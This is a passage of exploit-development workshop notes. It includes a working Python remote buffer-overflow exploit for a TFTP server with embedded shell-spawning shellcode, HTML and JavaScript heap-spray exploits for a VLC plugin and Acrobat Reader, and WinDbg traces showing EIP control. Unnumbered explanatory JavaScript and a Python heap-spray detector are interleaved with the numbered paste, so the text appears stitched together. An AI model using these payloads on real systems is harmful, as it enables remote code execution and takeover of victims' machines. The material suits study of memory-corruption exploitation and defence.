  2194. part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
  2195. part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
  2196. part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
  2197. part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
  2198. part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
  2199. part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
  2200. part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
  2201. part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
  2202.  
  2203.  
  2204. STACK SHIFTER:
  2205. prepend = "\x81\xC4\xFF\xEF\xFF\xFF" # add esp, -1001h
  2206. prepend += "\x44" # inc esp
  2207.  
  2208.  
  2209.  
  2210.  
  2211.  
  2212.  
  2213.  
  2214.  
  2215.  
  2216.  
  2217.  
  2218.  
  2219.  
  2220.  
  2221. ---- final script ----
  2222.  
  2223. #!/usr/bin/python2
  2224. #TFTP Server remote Buffer Overflow
  2225.  
  2226. import sys
  2227. import socket
  2228. import struct
  2229.  
  2230. if len(sys.argv) < 2:
  2231.     sys.stderr.write("Usage: tftpd.py <host>\n")
  2232.     sys.exit(1)
  2233.  
  2234. target = sys.argv[1]
  2235. port = 69
  2236.  
  2237. eip = 0x7e429353 # jmp esp in USER32.DLL
  2238.  
  2239. part1 = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
  2240. part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
  2241. part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
  2242. part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
  2243. part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
  2244. part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
  2245. part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
  2246. part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
  2247. part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
  2248. part1 += "\xf5\xad\x57\xff\xd6\x53\x53"
  2249.  
  2250. part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
  2251. part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
  2252. part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
  2253. part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
  2254. part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
  2255. part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
  2256. part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
  2257. part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
  2258. part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
  2259. part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
  2260. part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
  2261.  
  2262. prepend = "\x81\xC4\xFF\xEF\xFF\xFF" # add esp, -1001h
  2263. prepend += "\x44" # inc esp
  2264.  
  2265. buf = "\x00\x01" # receive command
  2266.  
  2267. buf += "\x90" * (256 - len(part2)) # NOPs
  2268. buf += part2 # shellcode part 2
  2269. buf += struct.pack('<I', eip) # EIP (JMP ESP)
  2270. buf += prepend # stack shifter
  2271. buf += part1 # shellcode part 1
  2272. buf += "\xE9" + struct.pack('<i', -380) # JMP -380
  2273. buf += "\x00" # END
  2274.  
  2275. # print buf
  2276.  
  2277. # buf = "\x00\x01" # receive command
  2278.  
  2279. # buf += "A" * 300 + "\x00"
  2280.  
  2281. sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  2282.  
  2283. try:
  2284.     sock.connect((target, port))
  2285.     sock.sendall(buf)
  2286. except Exception as e:
  2287.     sys.stderr.write("Cannot send to "+str(target)+" : "+str(port)+" : "+str(e)+"!\n")
  2288. finally:
  2289.     sock.close()
  2290.     sys.stderr.write("Sent.\n")
  2291.  
  2292.  
  2293.  
  2294. -----------------------------------------------------------------------------------------------------------------
  2295.  
  2296.  
  2297.  
  2298.  
  2299. How does all of this actually work
  2300.  
  2301.  
  2302.  
  2303.  
  2304. Total shellcode length: 315
  2305.  
  2306. Part1: 150
  2307. Part2: 165
  2308.  
  2309.  
  2310. NOPS * (256 - 165)
  2311.  
  2312. 91 NOPS + (165 bytes shellcode p2) + JMP ESP (4 bytes) + Stack Shift (-1000) + (150 bytes shellcode p1) + (neg jmp -380)
  2313. |<------------ 256 ----------->|<-- 260 -->|                    |<------ 150 ------>| (410)
  2314. ^                                                                                           |
  2315. |<------------------------ neg jmp -380: jump back to the 30 byte mark --------------------|
  2318.  
  2319.  
  2320.  
  2321. #####################
  2322. # Browsers Exploits #
  2323. #####################
  2324.  
  2325. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab3\ffvlc_skeleton
  2326. Quicktime - overflow, if we send a very long rtsp:// URL, Quicktime crashes
  2327. rtsp://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA......50000
  2328.  
  2329. <object id=quicktime clsid="999-999999-99-99999">
  2330. <param name="URL" value="rtsp://AAAAAAAAAAAAAAAAAAAAAAAAA....">
  2331. </object>
  2332.  
  2333. var buf = "";
  2334. for(i = 0; i < 50000; i++)
  2335. buf += "A";
  2336. var myobject = document.getElementById("quicktime");
  2337. myobject.url = buf;
  2338.  
  2339. YOU CAN PRE-LOAD THE PROCESS MEMORY MORE OR LESS IN A WAY YOU LIKE BEFORE TRIGGERING THE EXPLOIT!!!!
  2340.  
  2341. - Browsers (Flash)
  2342. - PDF
  2343. - MS Office / OOo
  2344.  
  2345. VLC smb:// exploit
  2346. ------------------
  2347.  
  2348. EXPLOIT VECTOR
  2349.  
  2350. smb://example.com@0.0.0.0/foo/#{}
  2351.  
  2352. Exploit Scripts
  2353. - ffvlc
  2354.  
  2355. ON YOUR HOST, RUN THE WEBSERVER ON PORT 8080
  2356.  
  2357. perl daemon.pl vlc0.html
  2358.  
  2359. ON YOUR Strategicsec-XP-ED-Target-VM VM, START FIREFOX
  2360. Browse to http://your_host_ip_address:8080/
  2361.  
  2362. vlc0.html
  2363. ---------
  2364. <script>
  2365. var buf = "";
  2366. for(i = 0; i < 1250; i++)
  2367. buf += unescape("%41%41%41%41");
  2368. var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
  2369. document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
  2370. </script>
  2371.  
  2372. vlc1.html
  2373. ---------
  2374. <script>
  2375.  
  2376. // shellcode created in heap memory
  2377. var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
  2378.  
  2379. // 800K block of NOPS
  2380. var nop = unescape("%u9090%u9090"); // 4 NOPS
  2381. while(nop.length < 0xc0000) {
  2382. nop += nop;
  2383. }
  2384.  
  2385. // spray the heap with NOP+shellcode
  2386. var memory = new Array();
  2387. for(i = 0; i < 50; i++) {
  2388. memory[i] = nop + shellcode;
  2389. }
  2390.  
  2391. // build the exploit payload
  2392. var buf = "";
  2393. for(i = 0; i < 1250; i++)
  2394. buf += unescape("%41%41%41%41");
  2395. var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
  2396.  
  2397. // trigger the exploit
  2398. document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
  2399. </script>
  2400.  
  2401. perl daemon.pl vlc1.html
  2402.  
  2403. Search for where our NOPS+shellcode lies in the heap
  2404.  
  2405. s 0 l fffffff 90 90 90 90 cc cc cc cc
  2406.  
  2407. 0:019> s 0 l fffffff 90 90 90 90 cc cc cc cc
  2408. 03dffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  2409. 040ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  2410. 043ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  2411. 046ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  2412. 049ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  2413. 04cffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  2414. 04fffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  2415. 052ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  2416. 055ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  2417. 058ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  2418. 05bffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  2419. 05effffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  2420. 061ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  2421. 064ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  2422. 067ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  2423. 06affffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  2424.  
  2425. Edit vlc2.html
  2426. replace %41%41%41%41 with %07%07%07%07
  2427.  
  2428. (928.fd0): Break instruction exception - code 80000003 (first chance)
  2429. eax=fffffd66 ebx=07070707 ecx=77c2c2e3 edx=00340000 esi=07070707 edi=07070707
  2430. eip=07100000 esp=0e7afc58 ebp=07070707 iopl=0 nv up ei pl nz ac pe nc
  2431. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
  2432. 07100000 cc int 3
  2433. 0:019> u
  2434. 07100000 cc int 3
  2435. 07100001 cc int 3
  2436. 07100002 cc int 3
  2437. 07100003 cc int 3
  2438. 07100004 cc int 3
  2439. 07100005 cc int 3
  2440. 07100006 cc int 3
  2441. 07100007 cc int 3
  2442.  
  2443. Create vlc3.html (Copy vlc2.html to vlc3.html)
  2444. ----------------------------------------------
  2445. Win32 Reverse Shell
  2446. - no restricted characters
  2447. - Encoder NONE
  2448. - use the Javascript encoded payload generated by msfweb
  2449.  
  2450.  
  2451.  
  2452.  
  2453. ################
  2454. # PDF EXPLOITS #
  2455. ################
  2456.  
  2457.  
  2458.  
  2459. \Lab4\adobe_mnp_skeleton
  2460.  
  2461. Acrobat Media newPlayer exploit
  2462. -------------------------------
  2463.  
  2464. Use-after-free bug
  2465.  
  2466. Exploit scripts are online at 172.16.0.100
  2467. - adobe_mnp
  2468.  
  2469. Download these scripts on your Strategicsec-XP-ED-Target-VM VM itself.
  2470.  
  2471.  
  2472. mnp0.pdf
  2473.  
  2474. - Open up acrobat reader
  2475. - WinDBG
  2476. - F6 attach to AcroRd32.exe
  2477. - g to Go
  2478.  
  2479. EIP = 41414141
  2480.  
  2481. Next step is to spray the heap with NOPS+shellcode, and then land EIP in the heap.
  2482.  
  2483. mnp1.pdf
  2484.  
  2485. All we are doing is changing EIP to 0c0c0c0c.
  2486. There is no heap spray in this one.
  2487.  
  2488. This exception may be expected and handled.
  2489. eax=02e2d638 ebx=23826917 ecx=02e2d638 edx=02e2f868 esi=02c07674 edi=02c07674
  2490. eip=0c0c0c0c esp=0013fb38 ebp=0013fbb8 iopl=0 nv up ei pl nz na po nc
  2491. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
  2492. 0c0c0c0c ?? ???
  2493.  
  2494. We know we get EIP control
  2495.  
  2496. mnp2.pdf
  2497.  
  2498. Put in the heap spray.
  2499.  
  2500. var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
  2501.  
  2502. var nops = unescape("%u9090%u9090");
  2503.  
  2504. while(nops.length <= 32768)
  2505. nops += nops;
  2506. nops = nops.substring(0,32768 - shellcode.length);
  2507.  
  2508. memory = new Array();
  2509.  
  2510. for(i = 0; i < 1500; i++) {
  2511. memory[i] = nops + shellcode;
  2512. }
  2513.  
  2514. 1500 NOP+shellcode blocks of 32K NOPs each
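Seen from the defender's side, the vlc1.html and mnp2.pdf sprays above share a small set of static tells. The block below is an added example (not part of the workshop files, and not any product's signatures): a heuristic scanner that looks for unescape("%u...") literals decoding to one repeated byte, a while loop that doubles a string on its own .length, and a loop that fills an array with nop + shellcode. The two JavaScript samples are constructed for the check; the regexes are assumptions tuned to the style of script on this page.

```python
import re

# unescape("...") whose content is only %uXXXX units (the JS heap-spray idiom).
UNESCAPE_RE = re.compile(r'unescape\(\s*"((?:%u[0-9a-fA-F]{4})+)"\s*\)')

# while (x.length < N) { x += x; }  -- a string growing itself until it is N units long.
DOUBLING_RE = re.compile(
    r"while\s*\(\s*(\w+)\.length\s*<=?\s*(?:0x[0-9a-fA-F]+|\d+)\s*\)\s*\{?\s*\1\s*\+=\s*\1\b"
)

# for (...) { arr[i] = a + b; }  -- many copies of one concatenation kept alive in an array.
ARRAY_FILL_RE = re.compile(
    r"for\s*\([^)]*\)\s*\{?\s*(\w+)\[\s*\w+\s*\]\s*=\s*(\w+)\s*\+\s*(\w+)\s*;"
)


def decode_unescape(literal):
    """Bytes that unescape('%uXXXX...') places in memory: each unit is UTF-16LE."""
    out = bytearray()
    for unit in re.findall(r"%u([0-9a-fA-F]{4})", literal):
        out += int(unit, 16).to_bytes(2, "little")
    return bytes(out)


def uniform_byte(data):
    """The repeated byte value if data is one byte over and over (0x90, 0xcc, 0x0c...), else None."""
    return data[0] if data and len(set(data)) == 1 else None


def analyze(js):
    """Return the individual tells plus an overall verdict for one script body."""
    fills = [uniform_byte(decode_unescape(m.group(1))) for m in UNESCAPE_RE.finditer(js)]
    report = {
        "uniform_unescape_bytes": sorted({b for b in fills if b is not None}),
        "self_doubling_loop": DOUBLING_RE.search(js) is not None,
        "array_fill_loop": ARRAY_FILL_RE.search(js) is not None,
    }
    report["likely_heap_spray"] = (
        report["self_doubling_loop"]
        and report["array_fill_loop"]
        and bool(report["uniform_unescape_bytes"])
    )
    return report


# Constructed sample in the shape of the vlc1.html spray above (trigger line left out).
VLC1_JS = r"""
var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
var nop = unescape("%u9090%u9090");
while(nop.length < 0xc0000) {
nop += nop;
}
var memory = new Array();
for(i = 0; i < 50; i++) {
memory[i] = nop + shellcode;
}
"""

# Constructed benign script: an array filled in a loop and a padded string, but no spray.
BENIGN_JS = r"""
var names = new Array();
for (i = 0; i < 10; i++) {
names[i] = "user" + i;
}
var title = unescape("%u0048%u0069");
while (title.length < 20) {
title += " ";
}
"""

if __name__ == "__main__":
    print(analyze(VLC1_JS))    # likely_heap_spray: True, uniform bytes [0x90, 0xcc]
    print(analyze(BENIGN_JS))  # likely_heap_spray: False
```

The three tells are deliberately kept separate in the report: a page that only doubles a string, or only fills an array, is ordinary JavaScript, and it is the combination with a uniform-byte literal that matches the sled-plus-shellcode layout searched for in the debugger above.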
  2515.  
  2516. We would have sprayed over address 0c0c0c0c, and we hope to hit EIP = 0c0c0c0c, and get INT3.
  2517.  
  2518. We want to see what led to the crash.
  2519.  
  2520. EIP is invalid, so we can't disassemble around EIP
  2521.  
  2522. We need to trace the function that called us and crashed.
  2523. - STACK TRACE
  2524. - dumps all the frames from the top of the stack
  2525. - shows you the series of calls that led up to the crash
  2526. - we will analyze the topmost frame, the function that called into our controlled address
  2527.  
  2528. WinDBG - stack trace - "k" command
  2529.  
  2530. 0:000> k
  2531. ChildEBP RetAddr
  2532. WARNING: Frame IP not in any known module. Following frames may be wrong.
  2533. 0013fb34 2d843117 0x90909090
  2534. 0013fbb8 23826934 Multimedia!PlugInMain+0x41b69
  2535. 0013fbdc 23825d8c EScript!PlugInMain+0x25584
  2536. 0013fc74 238257e2 EScript!PlugInMain+0x249dc
  2537. 0013fca4 238543c5 EScript!PlugInMain+0x24432
  2538. 0013fd04 00a78de1 EScript!PlugInMain+0x53015
  2539. 0013fd20 7e418734 AcroRd32_940000!DllCanUnloadNow+0x67290
  2540. 0013fd4c 7e418816 USER32!InternalCallWinProc+0x28
  2541. 0013fdb4 7e4189cd USER32!UserCallWinProcCheckWow+0x150
  2542. 0013fe14 7e418a10 USER32!DispatchMessageWorker+0x306
  2543. 0013fe24 00a323b4 USER32!DispatchMessageW+0xf
  2544. 0013fe94 00a31de8 AcroRd32_940000!DllCanUnloadNow+0x20863
  2545. 0013fecc 0094389f AcroRd32_940000!DllCanUnloadNow+0x20297
  2546. 0013fee4 009436ee AcroRd32_940000!AcroWinMain+0x1c8
  2547. 0013ff2c 00404004 AcroRd32_940000!AcroWinMain+0x17
  2548. 0013ffc0 7c817067 AcroRd32+0x4004
  2549. 0013fff0 00000000 kernel32!BaseProcessStart+0x23
  2550.  
2d843117 -- the return address that we would have returned to if we hadn't crashed.
The instruction immediately before it is the CALL that sent us to 90909090.

x86 instructions have variable length, so we don't know exactly how far before 2d843117 that CALL starts. Unassemble from a few bytes back until an instruction ends exactly at the return address:

u 2d843117
u 2d843117-2
u 2d843117-3 <---- we found the CALL instruction - call [edx+4]
u 2d843117-4

(WinDbg's "ub 2d843117" does this backwards search for you, but check its result the same way: unassembling from the middle of an instruction produces plausible-looking garbage.)

0:000> u 2d843117-3
Multimedia!PlugInMain+0x41b66:
2d843114 ff5204 call dword ptr [edx+4] <---- the culprit!!!
2d843117 6a00 push 0
2d843119 68d8b68c2d push offset Multimedia!PlugInMain+0xca12a (2d8cb6d8)
2d84311e 56 push esi
2d84311f e842aefdff call Multimedia!PlugInMain+0x1c9b8 (2d81df66)
2d843124 83c40c add esp,0Ch
2d843127 66b80100 mov ax,1
2d84312b 5e pop esi

call [edx+4] is a 3-byte instruction (ff 52 04), which is why -2 started mid-instruction and -3 is the right offset.

We control EDX
edx=0c0c0c0c

call [edx+4] = call [0c0c0c10]
dd edx+4

0:000> dd edx+4
0c0c0c10 90909090 90909090 90909090 90909090
0c0c0c20 90909090 90909090 90909090 90909090

0c0c0c10 holds our NOP bytes, so the call target is 90909090, the invalid EIP from the stack trace. The spray did reach 0c0c0c0c, but the program reads a pointer out of it instead of executing it.

Go back a few more bytes to see where EDX comes from:

0:000> u 2d843117-7
Multimedia!PlugInMain+0x41b62:
2d843110 8b10 mov edx,dword ptr [eax]
2d843112 8bc8 mov ecx,eax
2d843114 ff5204 call dword ptr [edx+4]

mov edx,[eax] / mov ecx,eax / call [edx+4] is the pattern of a C++ virtual call: EAX is the object pointer (copied into ECX as "this"), EDX is the object's vtable pointer and [edx+4] is the second function slot of the vtable. Look at the object:

dd eax

0:000> dd eax
02e2d680 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c
02e2d690 42424242 42424242 42424242 42424242
02e2d6a0 42424242 42424242 42424242 42424242
02e2d6b0 42424242 42424242 42424242 42424242
02e2d6c0 42424242 42424242 00000000 00000000

EAX points to an object at 02e2d680 whose first dword, the vtable pointer that mov edx,[eax] loads, is 0c0c0c0c, followed by a run of 42424242 that looks like the rest of our input. We have overwritten the object, so the vtable pointer is ours and the virtual call goes wherever the dword at 0c0c0c10 points.
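The "u 2d843117-2, -3, -4" guessing above can be mechanised. The following JavaScript is an added example, not part of the original notes or of Adobe Reader: given raw code bytes and a return address taken from the k output, it finds every CALL encoding that ends exactly at that return address. The byte array is transcribed from the "u 2d843117-7" listing above; the function names (callLength, describeCall, findCallBefore) are my own.

```javascript
// Added example, not part of the original notes or of Adobe Reader.
// Mechanises the "u 2d843117-2, -3, -4..." search: x86 instructions have
// variable length, so the CALL that precedes a return address may start
// 2 to 7 bytes before it. We try each length and keep only the candidates
// that decode as a CALL and end exactly at the return address.
// Function names (callLength, describeCall, findCallBefore) are my own.

const REG32 = ['eax', 'ecx', 'edx', 'ebx', 'esp', 'ebp', 'esi', 'edi'];

function hex(n) { return '0x' + (n >>> 0).toString(16); }

// Little-endian unsigned 32-bit read.
function u32(bytes, i) {
  return (bytes[i] | (bytes[i + 1] << 8) | (bytes[i + 2] << 16) | (bytes[i + 3] << 24)) >>> 0;
}

// Length of the CALL instruction at bytes[i], or 0 if there is no CALL there.
// Covers E8 rel32 and FF /2 (call r/m32) with every ModRM/SIB/displacement form.
function callLength(bytes, i) {
  const op = bytes[i];
  if (op === 0xe8) return 5;
  if (op !== 0xff || i + 1 >= bytes.length) return 0;
  const modrm = bytes[i + 1];
  const mod = modrm >> 6, reg = (modrm >> 3) & 7, rm = modrm & 7;
  if (reg !== 2) return 0;               // FF /2 is near call; other /digits are inc, push, jmp...
  if (mod === 3) return 2;               // call reg
  let len = 2;
  if (rm === 4) {                        // SIB byte present
    len += 1;
    if (mod === 0 && (bytes[i + 2] & 7) === 5) len += 4;  // no base register: disp32 follows SIB
  } else if (mod === 0 && rm === 5) {
    len += 4;                            // call dword ptr [disp32]
  }
  if (mod === 1) len += 1;               // [reg+disp8]
  if (mod === 2) len += 4;               // [reg+disp32]
  return len;
}

// WinDbg-style text for the CALL at bytes[i], whose address is addr.
function describeCall(bytes, i, addr) {
  if (bytes[i] === 0xe8) {
    const rel = u32(bytes, i + 1) | 0;   // rel32 is signed, relative to the next instruction
    return 'call ' + hex(addr + 5 + rel);
  }
  const modrm = bytes[i + 1];
  const mod = modrm >> 6, rm = modrm & 7;
  if (mod === 3) return 'call ' + REG32[rm];
  if (rm === 4) return 'call dword ptr [<sib form>]';
  if (mod === 0 && rm === 5) return 'call dword ptr [' + hex(u32(bytes, i + 2)) + ']';
  let disp = 0;
  if (mod === 1) disp = (bytes[i + 2] << 24) >> 24;      // sign-extend disp8
  if (mod === 2) disp = u32(bytes, i + 2) | 0;
  const tail = disp === 0 ? '' : (disp < 0 ? '-' : '+') + hex(Math.abs(disp));
  return 'call dword ptr [' + REG32[rm] + tail + ']';
}

// Every CALL that ends exactly at base+retOffset. More than one hit means the
// bytes are ambiguous; confirm with the registers as the notes do (dd edx+4).
function findCallBefore(bytes, base, retOffset) {
  const hits = [];
  for (let len = 2; len <= 7; len++) {
    const start = retOffset - len;
    if (start >= 0 && callLength(bytes, start) === len) {
      hits.push({ addr: base + start, length: len, text: describeCall(bytes, start, base + start) });
    }
  }
  return hits;
}

// Bytes transcribed from the "u 2d843117-7" listing in the notes, starting at 2d843110.
const BASE = 0x2d843110;
const CODE = Uint8Array.from([
  0x8b, 0x10,                   // mov edx,[eax]
  0x8b, 0xc8,                   // mov ecx,eax
  0xff, 0x52, 0x04,             // call dword ptr [edx+4]
  0x6a, 0x00,                   // push 0
  0x68, 0xd8, 0xb6, 0x8c, 0x2d, // push 2d8cb6d8
  0x56,                         // push esi
  0xe8, 0x42, 0xae, 0xfd, 0xff, // call 2d81df66
  0x83, 0xc4, 0x0c,             // add esp,0Ch
]);

// The return address from the k output is 2d843117, 7 bytes past BASE.
const culprit = findCallBefore(CODE, BASE, 0x2d843117 - BASE);
console.log(culprit.map(c => hex(c.addr) + ' ' + c.text)); // [ '0x2d843114 call dword ptr [edx+0x4]' ]
```

Because x86 code is not self-synchronising, a return address inside dense code can have more than one byte sequence that "looks like" a CALL ending there; the register check the notes do next (edx=0c0c0c0c, dd edx+4) is what confirms the candidate is the real one.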
  2594.  
mnp3.pdf

Change the NOPs 90909090 to 0c0c0c0c: build the sled from "%u0c0c" instead of "%u9090".

mov edx, [eax]
call [edx+4]

edx = 0c0c0c0c
edx+4 = 0c0c0c10
contents at edx+4 will also be "0c0c0c0c", because every dword in the sprayed block is now 0c0c0c0c

EIP will jump to 0c0c0c0c, which is inside the spray

and...

0:000> u 0c0c0c0c
*** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api -
0c0c0c0c 0c0c or al,0Ch
0c0c0c0e 0c0c or al,0Ch
0c0c0c10 0c0c or al,0Ch
0c0c0c12 0c0c or al,0Ch
0c0c0c14 0c0c or al,0Ch

The bytes 0c 0c decode as "or al,0Ch", a harmless 2-byte instruction (it only clobbers AL), and since every byte is 0c it decodes the same way from any offset. The 0c0c0c0c block therefore does double duty: read as data it is the fake vtable pointer, executed as code it is a NOP sled that slides down to the INT3 shellcode at the end of the block.
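To make the byte-level reasoning above concrete, here is an added example (not part of the original notes or of Adobe Reader) that rebuilds one spray block exactly the way the Acrobat JavaScript above does, using String.fromCharCode in place of unescape, and then inspects the bytes the heap actually holds. It covers both the mnp2 spray (%u9090) and the mnp3 spray (%u0c0c). The function names (buildBlock, toBytes, dwordAt, sprayFacts) are my own.

```javascript
// Added example, not part of the original notes. Rebuilds the spray block
// from the Acrobat JavaScript in the notes (String.fromCharCode instead of
// unescape, otherwise the same algorithm) and looks at the bytes the heap
// holds, to show why swapping %u9090 for %u0c0c makes the spray work.
// Function names (buildBlock, toBytes, dwordAt, sprayFacts) are my own.

const BLOCK_UNITS = 32768;      // 32768 UTF-16 code units = 64 KB per block
const BLOCK_COUNT = 1500;       // same count as the notes

// unescape("%uXXXX") yields one 16-bit code unit per %uXXXX; this does the same.
function fromUnits(units) {
  return String.fromCharCode.apply(null, units);
}

// Same construction as the notes: double the sled until it exceeds BLOCK_UNITS,
// then trim so sled + shellcode is exactly BLOCK_UNITS code units.
function buildBlock(sledUnit, shellcode) {
  let sled = fromUnits([sledUnit, sledUnit]);
  while (sled.length <= BLOCK_UNITS) sled += sled;
  sled = sled.substring(0, BLOCK_UNITS - shellcode.length);
  return sled + shellcode;
}

// The bytes of a JS string as they sit in memory: UTF-16, low byte first.
function toBytes(str) {
  const out = new Uint8Array(str.length * 2);
  for (let i = 0; i < str.length; i++) {
    const u = str.charCodeAt(i);
    out[2 * i] = u & 0xff;
    out[2 * i + 1] = u >>> 8;
  }
  return out;
}

// The dword that "call dword ptr [edx+4]" loads if edx+4 points at byte offset off.
function dwordAt(bytes, off) {
  return (bytes[off] | (bytes[off + 1] << 8) | (bytes[off + 2] << 16) | (bytes[off + 3] << 24)) >>> 0;
}

// True when every sled byte is identical, so the sled decodes the same way
// wherever EIP lands in it and, read as data, every 4-byte load returns the
// same dword regardless of alignment.
function sledIsUniform(bytes, shellcodeBytes) {
  const sledEnd = bytes.length - shellcodeBytes;
  for (let i = 0; i < sledEnd; i++) if (bytes[i] !== bytes[0]) return false;
  return true;
}

// INT3 shellcode from the notes: eight %ucccc units = sixteen 0xcc bytes.
const SHELLCODE = fromUnits(new Array(8).fill(0xcccc));

// Summary of one block built with the given sled unit (0x9090 or 0x0c0c).
function sprayFacts(sledUnit) {
  const bytes = toBytes(buildBlock(sledUnit, SHELLCODE));
  const shellcodeBytes = SHELLCODE.length * 2;
  return {
    bytesPerBlock: bytes.length,
    totalSprayBytes: bytes.length * BLOCK_COUNT,
    pointerRead: dwordAt(bytes, 4),          // what the vulnerable call loads from [edx+4]
    unalignedRead: dwordAt(bytes, 0x1235),   // same load at an odd offset into the sled
    uniformSled: sledIsUniform(bytes, shellcodeBytes),
    firstShellcodeByte: bytes[bytes.length - shellcodeBytes],
  };
}

const mnp2 = sprayFacts(0x9090);  // pointerRead 0x90909090: the invalid EIP from the k output
const mnp3 = sprayFacts(0x0c0c);  // pointerRead 0x0c0c0c0c: points back into the spray
console.log(mnp2, mnp3);
```

The 0x1235 read is there to make the alignment point explicit: the vulnerable code can land at any offset in the sled, and only because every sled byte is identical does the loaded vtable pointer come out as 0c0c0c0c no matter where [edx+4] falls. One caveat when porting this reasoning to other JavaScript engines: some engines store strings whose code units are all below 0x100 as one byte per character, so %uXXXX values above 0xff are what guarantee the two-bytes-per-character layout this analysis relies on; both 0x9090 and 0x0c0c satisfy that.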